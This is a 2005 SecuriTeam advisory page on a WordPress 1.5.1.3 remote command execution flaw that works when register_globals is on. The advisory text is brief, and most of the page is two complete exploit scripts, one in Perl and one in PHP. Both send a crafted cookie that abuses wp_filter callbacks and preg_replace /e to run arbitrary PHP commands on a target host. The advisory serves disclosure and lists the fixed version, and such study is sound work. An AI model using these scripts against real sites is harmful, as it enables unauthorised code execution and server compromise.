Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
SecuriTeam  Beyond Security  SecuriTeam Home  Ask the Team  Mailing Lists  Advertising Info  Blogs  Black Box Testing  Vulnerability Assessment  Vulnerability Scanner SecuriTeam in Your Inbox   E-mail this article to a friend New vulnerability? New tool? Tell us	WordPress Command Execution Vulnerability (Cache_lastpostdate) 10 Aug. 2005    Summary A vulnerability in WordPress's handling of incoming cookie information allows remote attackers to cause the program to execute arbitrary code if the PHP settings of register_globals has been set to On.   Credit: The information has been provided by Kartoffelguru.    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * WordPress version 1.5.1.3 and prior (with register_globals) Immune Systems:  * WordPress version 1.5.1.4 or newer Perl Exploit: #!/usr/bin/perl use strict; use MIME::Base64 qw(encode_base64 decode_base64); use IO::Socket; print "Wordpress <= 1.5.1.3 - remote code execution 0-DDAAYY exploit (Converted by Noam)\n"; print "(C) Copyright 2005 Kartoffelguru\n\n"; print "[!] info: requires register_globals turned on on target host\n\n"; if (@ARGV < 2) {  die ("usage:\n\t./wpx.php http://www.xyz.net/blog/ 'system(\"uname -a;id\");'\n\n"); } my $url = shift; my $cmd = shift; if (length($cmd)==0) {  $cmd = 'phpinfo();'; } #print "code: ".encode_base64($cmd, '')."\n"; my @code = unpack("C*", encode_base64($cmd, '')); #print "code: @code\n"; my $cnv = ""; for (my $i=0;$i<@code; $i++) {  $cnv.= "chr(".$code[$i].")."; } $cnv.="chr(32)"; #print "cnv: $cnv\n"; my $str = encode_base64('args[0]=eval(base64_decode('.$cnv.')).die()&args[1]=x', ''); #print "str: [$str]\n"; my $cookie='wp_filter[query_vars][0][0][function]=get_lastpostdate;". "wp_filter[query_vars][0][0][accepted_args]=0;'; $cookie.='wp_filter[query_vars][0][1][function]=base64_decode;". "wp_filter[query_vars][0][1][accepted_args]=1;'; $cookie.='cache_lastpostmodified[server]=//e;cache_lastpostdate[server]='; $cookie.=$str; $cookie.=';wp_filter[query_vars][1][0][function]=parse_str;". "wp_filter[query_vars][1][0][accepted_args]=1;'; $cookie.='wp_filter[query_vars][2][0][function]=get_lastpostmodified;" . "wp_filter[query_vars][2][0][accepted_args]=0;'; $cookie.='wp_filter[query_vars][3][0][function]=preg_replace;" . "wp_filter[query_vars][3][0][accepted_args]=3;'; $url =~ /http:\/\/([^\/]+)\/(.*?)/; my $hostname = $1; my $path = $2; my $Request = "GET /$path HTTP/1.1\r Host: $hostname\r Cookie: $cookie\r Referer: $hostname\r Connection: close\r User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)\r \r "; my $socket = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $hostname, PeerPort => 80); unless ($socket) { die "cannot connect to http daemon on $hostname" } print "Request: [$Request]\n"; print $socket $Request; while (<$socket>) {  print $_; } PHP Exploit: <?php     echo "Wordpress <= 1.5.1.3 - remote code execution 0-DDAAYY exploit\n";     echo "(C) Copyright 2005 Kartoffelguru\n\n";     echo "[!] info: requires register_globals turned on on target host\n\n";     if (!extension_loaded('curl')) {         die ("[-] you need the curl extension activated...\n");     }     function usage()     {         die ("usage:\n\t./wpx.php -h http://www.xyz.net/blog/ -c 'system(\"uname -a;id\");'\n\n");     }     $options = getopt("h:c:");     if (count($options) < 1 || !isset($options['h'])) {         usage();     }     $host = (is_array($options['h']) ? $options['h'][0]:$options['h']);     $cmd = (is_array($options['c']) ? $options['c'][0]:$options['c']);     if (!preg_match("/^http:\/\//", $host, $dummy)) {         usage();     }     if (strlen(trim($cmd))==0) {         $cmd = 'phpinfo();';     }     $code = base64_encode($cmd);     echo "code: $code\n";     $cnv = "";     for ($i=0;$i<strlen($code); $i++) {         $cnv.= "chr(".ord($code[$i]).").";     }     $cnv.="chr(32)";     echo "cnv: $cnv\n";     $str = base64_encode('args[0]=eval(base64_decode('.$cnv.')).die()&args[1]=x');     $cookie='wp_filter[query_vars][0][0][function]=get_lastpostdate;' . 'wp_filter[query_vars][0][0][accepted_args]=0;';     $cookie.='wp_filter[query_vars][0][1][function]=base64_decode;' . 'wp_filter[query_vars][0][1][accepted_args]=1;';     $cookie.='cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=';     $cookie.=$str;     $cookie.=';wp_filter[query_vars][1][0][function]=parse_str;' . 'wp_filter[query_vars][1][0][accepted_args]=1;';     $cookie.='wp_filter[query_vars][2][0][function]=get_lastpostmodified;' . 'wp_filter[query_vars][2][0][accepted_args]=0;';     $cookie.='wp_filter[query_vars][3][0][function]=preg_replace;' . 'wp_filter[query_vars][3][0][accepted_args]=3;';     $ch = curl_init();     curl_setopt($ch, CURLOPT_URL, $host);     curl_setopt($ch, CURLOPT_POST, 0);     curl_setopt($ch, CURLOPT_COOKIE, $cookie);     curl_setopt($ch, CURLOPT_HEADER, 0);     curl_setopt($ch, CURLOPT_CURLOPT_REFERER, $host);     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);     curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)");     curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);     echo "[+] now executing\n\n";     $r = curl_exec($ch);     curl_close($ch);     echo $r; ?>  Comments:  Add new comment:  Subject:  Name/Nick/Email:          Chars Left:	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles Apple WebKit attr() Invalid Attribute Memory Corruption Vulnerability Pivot Cross Site Scripting and HTML Injection IBM AIX ToolTalk Database Server Buffer Overflow Vulnerability Webmedia Explorer Cross Site Scripting Vulnerability phpMyAdmin Code Injection Pantha transLucid Cross Site Scripting and HTML Injection Vulnerabilities Clam AntiVIrus Generic Bypass Using RAR CAB or ZIP Files Apache Tomcat RequestDispatcher Directory Traversal Vulnerability HP-UX Running OpenSSL DoS Joomla JA_Purity Multiple Persistent XSS Drupal Flag Module Multiple Vulnerabilities Apple Terminal xterm Resize Escape Sequence Memory Corruption Vulnerability Apple CUPS NULL Pointer Vulnerability OCS Inventory NG Multiple SQL Injections HP-UX Execution of Arbitrary Code and Other Vulnerabilities  Featured Articles Adobe Shockwave Player Director File Parsing Pointer Overwrite Mozilla Firefox Java Applet Loading Vulnerability Microsoft Internet Explorer Security Zone Restrictions Bypass Adobe Acrobat and Reader Heap Overflow Vulnerability Adobe Reader U3D Stack Overflow Vulnerability Apple CUPS NULL Pointer Vulnerability SonicWALL Global Security Client Privilege Escalation Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2008 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®